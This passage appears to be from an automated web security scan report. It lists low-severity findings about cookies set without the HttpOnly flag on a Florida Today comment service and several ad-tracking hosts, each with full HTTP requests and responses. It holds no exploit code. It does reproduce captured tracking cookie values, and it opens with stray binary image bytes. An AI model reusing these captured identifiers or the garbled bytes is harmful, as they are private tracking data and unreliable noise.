......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.........................................................................`.."..............................
...[SNIP]...

10.109. http://sitelife.floridatoday.com/ver1.0/Direct/DirectProxy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Direct/DirectProxy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/DirectProxy HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, max-age=86374
Content-Length: 729
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 10 May 2011 08:22:28 GMT
Last-Modified: Mon, 09 May 2011 08:22:28 GMT
ETag: 178565259
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Date: Mon, 09 May 2011 13:59:34 GMT

document.write("<script type='text/javascript' src='http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js'></script>");
document.write("<script type='text/javascript' src='http:
...[SNIP]...

10.110. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/json-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/json-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/json-min.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 3480
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Jan 2011 18:12:17 GMT
Accept-Ranges: bytes
ETag: "71c66d3f84b2cb1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:37 GMT

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
YAHOO.lang.JSON=(function(){var l=YAHOO.lang,_
...[SNIP]...

10.111. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/pork.iframe.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/pork.iframe.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/pork.iframe.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 5079
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 22:50:07 GMT
Accept-Ranges: bytes
ETag: "5c44c59dadacc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT

document.iframeLoaders = {};

iframe = function() { this.initialize.apply(this, arguments); };
iframe.prototype = {
initialize: function(form, options, count) {
count = count || (new Date
...[SNIP]...

10.112. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requestbatch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/requestbatch.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/requestbatch.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 11342
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 21:27:06 GMT
Accept-Ranges: bytes
ETag: "83414f4a2acc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT

if (typeof(RequestBatch) === 'undefined') {
RequestBatch = function() {
this.initialize.apply(this, arguments);
};
// for unique id
var counter = 0;

// how many reque
...[SNIP]...

10.113. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requesttypes.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/requesttypes.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/requesttypes.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 76278
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 21:27:06 GMT
Accept-Ranges: bytes
ETag: "238e9b4a2acc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT


// ------------------------------------------------------------------------------------
// This file contains all the request type objects for the SiteLife JSON Direct API.
// Create instances of
...[SNIP]...

10.114. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/yahoo-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/yahoo-min.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 5833
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Jan 2011 18:12:17 GMT
Accept-Ranges: bytes
ETag: "d628703f84b2cb1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:36 GMT

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YAHO
...[SNIP]...

10.115. http://sitelife.floridatoday.com/ver1.0/daapi2.api

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=34faabe1-935e-4483-8538-ddb5398c32aa; domain=floridatoday.com; expires=Tue, 08-May-2012 14:00:40 GMT; path=/
Date: Mon, 09 May 2011 14:00:39 GMT
Content-Length: 3035

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...

10.116. http://sitelife.floridatoday.com/ver1.0/direct/javascriptsdkproxy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/direct/javascriptsdkproxy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/direct/javascriptsdkproxy HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220; rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, max-age=86320
Content-Length: 68778
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 10 May 2011 08:22:28 GMT
Last-Modified: Mon, 09 May 2011 08:22:28 GMT
ETag: -1678712871
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Date: Mon, 09 May 2011 14:00:33 GMT

...
var PluckSDK=(function(){var extend=function(obj,options){for(var v in options){obj[v]=options[v];}
return obj;};function instance(obj,constructor,objectType,options){if(!(obj instanceof construct
...[SNIP]...

10.117. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304791878

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7850 30800
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304949607; domain=.mathtag.com; path=/; expires=Tue, 08-May-2012 14:00:07 GMT
Content-Length: 0


10.118. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:46 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 20:00:46 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

10.119. http://t.invitemedia.com/track_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496061384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:53 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949613+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuGYfYNZgFHi7bP571gUGDV65y94x2LAaAHmc4lwrDzLCpTt/N4GlGXQYDBgsGAAit47wCrAJLHlwq+3yKJXPrMA1a5HE30FFGWSeLboB4roivkgcyf3nUYR3Xkf5JZZ89ciRAEj8S6p"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4CLAKPH22fx3LAaMFmCaS5jjagRQsPN72zsWBQYNBgMGCwag4HpXASaJLRd+vUUWPB4owCyxHk1wWyhQ++S+0yiCe0EWzZq/FiEIAES0Iic="; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.120. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU:LCN&si=12177&pi=&xs=3&pu=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253Fifu%253D&df=1&v=5.5&cb=96391 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 14:14:49 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 13:59:49 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305554389|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554389; path=/; expires=Mon, 16-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304949589^1304951389|12177^1304949589^1304951389; path=/; expires=Mon, 09-May-11 14:29:49 GMT; domain=tacoda.at.atwola.com
